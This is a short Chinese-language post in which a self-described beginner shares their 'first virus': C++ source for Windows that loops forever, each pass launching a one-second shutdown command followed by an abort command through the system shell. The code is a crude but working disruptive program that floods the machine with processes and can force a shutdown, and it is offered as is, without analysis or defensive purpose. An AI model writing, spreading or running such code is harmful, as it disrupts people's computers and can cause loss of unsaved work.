大家好,我是一位小萌新,我第一次做病毒,做的不是很好
求谅解!!!
#include <bits/stdc++.h>
#include <windows.h>
#include <math.h>
using namespace std;
void window_open(){
system("start shutdown -a");
}
int main(){
for(;;){
system("start shutdown -s -t 1");
window_open();
}
return 0;
}